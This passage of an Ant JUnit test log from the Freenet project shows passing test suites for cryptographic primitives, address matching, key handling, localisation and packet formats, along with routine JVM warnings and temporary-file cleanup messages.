    [junit] Testcase: testDeriveSecretKeyNullInput4 took 0,001 sec
    [junit] Testcase: testGenNonceNegativeLength took 0 sec
    [junit] Testcase: testDeriveIvParameterSpecLength took 0,119 sec
    [junit] Testcase: testDeriveIvParameterSpecNullInput1 took 0,002 sec
    [junit] Testcase: testDeriveIvParameterSpecNullInput2 took 0,001 sec
    [junit] Testcase: testDeriveIvParameterSpecNullInput3 took 0 sec
    [junit] Testcase: testDeriveIvParameterSpecNullInput4 took 0,001 sec
    [junit] Testcase: testGenKeyPairDSAType took 0 sec
    [junit] Testcase: testGetPublicKeyPairDSAType took 0 sec
    [junit] Testcase: testGetIvParameterSpecNullInput took 0,001 sec
    [junit] Testcase: testGenIVNegativeLength took 0 sec
    [junit] Testcase: testGenSecretKey took 0,006 sec
    [junit] Testcase: testGetKeyPairPublicKeyPrivateKeySamePublic took 0,001 sec
    [junit] Testcase: testGenKeyPair took 0,034 sec
    [junit] Running freenet.crypt.MasterSecretTest
    [junit] Testsuite: freenet.crypt.MasterSecretTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,306 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,306 sec
    [junit] 
    [junit] Testcase: testDeriveKeyLength took 0,639 sec
    [junit] Testcase: testDeriveKeyNullInput took 0,002 sec
    [junit] Testcase: testDeriveIvLength took 0,081 sec
    [junit] Testcase: testDeriveKey took 0,039 sec
    [junit] Testcase: testDeriveIvNullInput took 0,002 sec
    [junit] Testcase: testDeriveIv took 0,01 sec
    [junit] Running freenet.crypt.MessageAuthCodeTest
    [junit] Testsuite: freenet.crypt.MessageAuthCodeTest
    [junit] HMACSHA256
    [junit] HMACSHA384
    [junit] HMACSHA512
    [junit] Poly1305AES
    [junit] Tests run: 29, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,935 sec
    [junit] Tests run: 29, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,935 sec
    [junit] ------------- Standard Output ---------------
    [junit] HMACSHA256
    [junit] HMACSHA384
    [junit] HMACSHA512
    [junit] Poly1305AES
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testSetIVIvParameterSpec took 0,868 sec
    [junit] Testcase: testAddBytesByteBufferNullInput took 0,01 sec
    [junit] Testcase: testVerifyData took 0,072 sec
    [junit] Testcase: testVerifyDataNullInput1 took 0,016 sec
    [junit] Testcase: testVerifyDataNullInput2 took 0,005 sec
    [junit] Testcase: testAddByte took 0,031 sec
    [junit] Testcase: testAddBytesByteArrayIntIntNullInput took 0,003 sec
    [junit] Testcase: testGenIV took 0,001 sec
    [junit] Testcase: testGetIV took 0,001 sec
    [junit] Testcase: testGenIVLength took 0,002 sec
    [junit] Testcase: testGenIVUnsupportedTypeException took 0,002 sec
    [junit] Testcase: testVerifyNullInput1 took 0,001 sec
    [junit] Testcase: testVerifyNullInput2 took 0,001 sec
    [junit] Testcase: testGetMacByteArrayArray took 0,013 sec
    [junit] Testcase: testGetMacByteArrayArrayNullInput took 0,003 sec
    [junit] Testcase: testVerifyDataFalse took 0,012 sec
    [junit] Testcase: testSetIVIvParameterSpecNullInput took 0,001 sec
    [junit] Testcase: testAddBytesByteBuffer took 0,029 sec
    [junit] Testcase: testGetIVUnsupportedTypeException took 0,002 sec
    [junit] Testcase: testAddBytesByteArrayIntIntOffsetOutOfBounds took 0,003 sec
    [junit] Testcase: testAddBytesByteArrayIntIntLengthOutOfBounds took 0,012 sec
    [junit] Testcase: testAddByteNullInput took 0,006 sec
    [junit] Testcase: testAddBytesByteArrayIntInt took 0,041 sec
    [junit] Testcase: testGetMacByteArrayArrayNullMatrixElementInput took 0,004 sec
    [junit] Testcase: testGetKey took 0,009 sec
    [junit] Testcase: testVerifyFalse took 0 sec
    [junit] Testcase: testGetMacByteArrayArrayReset took 0,018 sec
    [junit] Testcase: testSetIVIvParameterSpecUnsupportedTypeException took 0,001 sec
    [junit] Testcase: testVerify took 0 sec
    [junit] Running freenet.crypt.PCFBModeTest
    [junit] Testsuite: freenet.crypt.PCFBModeTest
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12391033ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12306733ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 11,715 sec
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 11,715 sec
    [junit] ------------- Standard Output ---------------
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12391033ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12306733ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testKnownValues took 7,73 sec
    [junit] Testcase: testKnownValuesRandomLength took 2,027 sec
    [junit] Testcase: testRandom took 1,476 sec
    [junit] Running freenet.crypt.TrivialPaddedBucketTest
    [junit] Testsuite: freenet.crypt.TrivialPaddedBucketTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,342 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,342 sec
    [junit] 
    [junit] Testcase: testSimple took 0,872 sec
    [junit] Running freenet.crypt.YarrowTest
    [junit] Testsuite: freenet.crypt.YarrowTest
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi1400214721143539532lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12111166ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12287327ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 9,909 sec
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 9,909 sec
    [junit] ------------- Standard Output ---------------
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12111166ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12287327ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testNextBoolean took 9,322 sec
    [junit] Testcase: testDouble took 0,087 sec
    [junit] Testcase: testNextInt took 0,011 sec
    [junit] Running freenet.crypt.ciphers.RijndaelTest
    [junit] Testsuite: freenet.crypt.ciphers.RijndaelTest
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12295028ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12280510ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 13,422 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 13,422 sec
    [junit] ------------- Standard Output ---------------
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12295028ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12280510ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testGladmanTestVectors took 12,014 sec
    [junit] Testcase: testNonStandardTestVK took 0,01 sec
    [junit] Testcase: testStandardTestVKJCA took 0,242 sec
    [junit] Testcase: testKnownValue took 0,001 sec
    [junit] Testcase: testStandardTestVK took 0,019 sec
    [junit] Testcase: testRandom took 0,672 sec
    [junit] Running freenet.io.AddressIdentifierTest
    [junit] Testsuite: freenet.io.AddressIdentifierTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,535 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,535 sec
    [junit] 
    [junit] Testcase: test took 0,045 sec
    [junit] Testcase: testIsAnISATAPIPv6Address took 0,002 sec
    [junit] Running freenet.io.Inet4AddressMatcherTest
    [junit] Testsuite: freenet.io.Inet4AddressMatcherTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,506 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,506 sec
    [junit] 
    [junit] Testcase: test took 0,035 sec
    [junit] Running freenet.io.Inet6AddressMatcherTest
    [junit] Testsuite: freenet.io.Inet6AddressMatcherTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,489 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,489 sec
    [junit] 
    [junit] Testcase: test took 0,025 sec
    [junit] Running freenet.io.MessageTest
    [junit] Testsuite: freenet.io.MessageTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,613 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,613 sec
    [junit] 
    [junit] Testcase: test took 0,102 sec
    [junit] Running freenet.keys.ClientCHKBlockTest
    [junit] Testsuite: freenet.keys.ClientCHKBlockTest
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi8597104015519126133lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12046351ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12363920ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 30,534 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 30,534 sec
    [junit] ------------- Standard Output ---------------
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12046351ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12363920ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testEncodeDecodeNearlyFullBlock took 20,355 sec
    [junit] Testcase: testEncodeDecodeShortInteger took 5,12 sec
    [junit] Testcase: testEncodeDecodeRandomLength took 0,507 sec
    [junit] Testcase: testEncodeDecodeEmptyBlock took 0,044 sec
    [junit] Testcase: testEncodeDecodeFullBlock took 4,072 sec
    [junit] Running freenet.keys.FreenetURITest
    [junit] Testsuite: freenet.keys.FreenetURITest
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi4925345381680209058lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12143503ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12278956ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 8,385 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 8,385 sec
    [junit] ------------- Standard Output ---------------
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12143503ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12278956ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testDeriveRequestURIFromInsertURI took 7,9 sec
    [junit] Testcase: testSskForUSK took 0,007 sec
    [junit] Running freenet.l10n.BaseL10nTest
    [junit] Testsuite: freenet.l10n.BaseL10nTest
    [junit] The default translation for test.nonexistent hasn't been found!
    [junit] java.lang.Exception
    [junit]     at freenet.l10n.BaseL10n.getFallbackString(BaseL10n.java:545)
    [junit]     at freenet.l10n.BaseL10n.access$000(BaseL10n.java:37)
    [junit]     at freenet.l10n.BaseL10n$L10nStringIterator.next(BaseL10n.java:166)
    [junit]     at freenet.l10n.BaseL10n$L10nStringIterator.next(BaseL10n.java:140)
    [junit]     at freenet.l10n.BaseL10n.getString(BaseL10n.java:447)
    [junit]     at freenet.l10n.BaseL10nTest.testGetStringNonexistent(BaseL10nTest.java:188)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit] Tests run: 20, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,014 sec
    [junit] Tests run: 20, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,014 sec
    [junit] ------------- Standard Error -----------------
    [junit] The default translation for test.nonexistent hasn't been found!
    [junit] java.lang.Exception
    [junit]     at freenet.l10n.BaseL10n.getFallbackString(BaseL10n.java:545)
    [junit]     at freenet.l10n.BaseL10n.access$000(BaseL10n.java:37)
    [junit]     at freenet.l10n.BaseL10n$L10nStringIterator.next(BaseL10n.java:166)
    [junit]     at freenet.l10n.BaseL10n$L10nStringIterator.next(BaseL10n.java:140)
    [junit]     at freenet.l10n.BaseL10n.getString(BaseL10n.java:447)
    [junit]     at freenet.l10n.BaseL10nTest.testGetStringNonexistent(BaseL10nTest.java:188)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testAddL10nSubstitutionMissingBrace took 0,267 sec
    [junit] Testcase: testAddL10nSubstitutionMissingFallback took 0,024 sec
    [junit] Testcase: testAddL10nSubstitutionUnclosedMissing took 0,008 sec
    [junit] Testcase: testAddL10nSubstitutionMissing took 0,009 sec
    [junit] Testcase: testAddL10nSubstitutionSelfNested took 0,009 sec
    [junit] Testcase: testGetStringOverridden took 0,011 sec
    [junit] Testcase: testAddL10nSubstitutionExtra took 0,009 sec
    [junit] Testcase: testAddL10nSubstitution took 0,009 sec
    [junit] Testcase: testAddL10nSubstitutionUnclosed took 0,009 sec
    [junit] Testcase: testGetStringFallbackOverridden took 0,01 sec
    [junit] Testcase: testGetStringNonexistent took 0,047 sec
    [junit] Testcase: testAddL10nSubstitutionDouble took 0,008 sec
    [junit] Testcase: testGetStringFallback took 0,017 sec
    [junit] Testcase: testAddL10nSubstitutionNested took 0,008 sec
    [junit] Testcase: testAddL10nSubstitutionUnmatchedClose took 0,008 sec
    [junit] Testcase: testAddL10nSubstitutionMultiple took 0,009 sec
    [junit] Testcase: testAddL10nSubstitutionSelfNestedEmpty took 0,008 sec
    [junit] Testcase: testGetString took 0,007 sec
    [junit] Testcase: testAddL10nSubstitutionFallback took 0,021 sec
    [junit] Testcase: testStrings took 8,934 sec
    [junit] Running freenet.node.LocationTest
    [junit] Testsuite: freenet.node.LocationTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,899 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,899 sec
    [junit] 
    [junit] Testcase: testDistanceAllowInvalid took 0,019 sec
    [junit] Testcase: testNormalize took 0 sec
    [junit] Testcase: testDistance took 0,001 sec
    [junit] Testcase: testChange took 0,004 sec
    [junit] Testcase: testEquals took 0 sec
    [junit] Testcase: testIsValid took 0,001 sec
    [junit] Running freenet.node.MasterKeysTest
    [junit] Testsuite: freenet.node.MasterKeysTest
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi5606170937759971460lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12409068ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12472834ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Writing new master.keys file
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Encrypted password with 50 iterations.
    [junit] Writing new master.keys file
    [junit] Trying to read master keys file...
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Trying to read master keys file...
    [junit] Encrypted password with 130 iterations.
    [junit] Decrypting master keys using password with 130 iterations...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Encrypted password with 760 iterations.
    [junit] Writing new master.keys file
    [junit] Encrypted password with 1230 iterations.
    [junit] Decrypting master keys using password with 1230 iterations...
    [junit] Trying to read master keys file...
    [junit] Decrypting master keys using password with 1230 iterations...
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Writing new master.keys file
    [junit] Encrypted password with 2460 iterations.
    [junit] Decrypting master keys using password with 2460 iterations...
    [junit] Trying to read master keys file...
    [junit] Trying to read master keys file...
    [junit] Decrypting master keys using password with 2460 iterations...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,656 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,656 sec
    [junit] ------------- Standard Output ---------------
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12409068ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12472834ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Encrypted password with 50 iterations.
    [junit] Encrypted password with 130 iterations.
    [junit] Decrypting master keys using password with 130 iterations...
    [junit] Encrypted password with 760 iterations.
    [junit] Encrypted password with 1230 iterations.
    [junit] Decrypting master keys using password with 1230 iterations...
    [junit] Decrypting master keys using password with 1230 iterations...
    [junit] Encrypted password with 2460 iterations.
    [junit] Decrypting master keys using password with 2460 iterations...
    [junit] Decrypting master keys using password with 2460 iterations...
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] Writing new master.keys file
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Writing new master.keys file
    [junit] Trying to read master keys file...
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Writing new master.keys file
    [junit] Trying to read master keys file...
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Writing new master.keys file
    [junit] Trying to read master keys file...
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testChangePasswordEmptyToEmpty took 9,014 sec
    [junit] Testcase: testChangePasswordSomethingToEmpty took 0,138 sec
    [junit] Testcase: testRestartWithPassword took 0,152 sec
    [junit] Testcase: testChangePasswordSomethingToSomething took 0,385 sec
    [junit] Testcase: testChangePasswordEmptyToSomething took 0,267 sec
    [junit] Testcase: testRestartNoPassword took 0,014 sec
    [junit] Running freenet.node.MessageWrapperTest
    [junit] Testsuite: freenet.node.MessageWrapperTest
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,574 sec
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,574 sec
    [junit] 
    [junit] Testcase: testGetFragmentWithLoss took 0,134 sec
    [junit] Testcase: testLost took 0,002 sec
    [junit] Testcase: testGetFragment took 0,001 sec
    [junit] Running freenet.node.NPFPacketTest
    [junit] Testsuite: freenet.node.NPFPacketTest
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi197424770511261387lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] Tests run: 22, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 3,957 sec
    [junit] Tests run: 22, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 3,957 sec
    [junit] ------------- Standard Output ---------------
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testSendEmptyPacket took 0,149 sec
    [junit] Testcase: testPacketWithAck took 0,005 sec
    [junit] Testcase: testSendCompletePacket took 0,025 sec
    [junit] Testcase: testReceiveBadFragment took 0,001 sec
    [junit] Testcase: testEncodeDecodeLossyPerPacketMessages2 took 0,004 sec
    [junit] Testcase: testPacketWithFragments took 0,001 sec
    [junit] Testcase: testSendPacketWithAck took 0 sec
    [junit] Testcase: testSendPacketWithTwoAcks took 0,004 sec
    [junit] Testcase: testReceiveSequenceNumber took 0,001 sec
    [junit] Testcase: testEmptyPacket took 0,001 sec
    [junit] Testcase: testSendPacketWithTwoAcksLong took 0 sec
    [junit] Testcase: testReceiveZeroLengthFragment took 0 sec
    [junit] Testcase: testReceiveLongFragmentedMessage took 0,001 sec
    [junit] Testcase: testSendPacketWithAcks took 0,001 sec
    [junit] Testcase: testEncodeDecodeLossyPerPacketMessages2Padded took 2,813 sec
    [junit] Testcase: testReceivedLargeFragment took 0 sec
    [junit] Testcase: testLength took 0 sec
    [junit] Testcase: testPacketWithFragment took 0,02 sec
    [junit] Testcase: testSendPacketWithAckRange took 0 sec
    [junit] Testcase: testEncodeDecodeLossyPerPacketMessages took 0,003 sec
    [junit] Testcase: testPacketWithAcks took 0,001 sec
    [junit] Testcase: testSendPacketWithFragment took 0,001 sec
    [junit] Running freenet.node.NewPacketFormatTest
    [junit] Testsuite: freenet.node.NewPacketFormatTest
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12498625ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12406267ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 14,78 sec
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 14,78 sec
    [junit] ------------- Standard Output ---------------
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12498625ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12406267ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testLoadStatsSendWhenPeerWants took 1,141 sec
    [junit] Testcase: testResendAlreadyCompleted took 0,206 sec
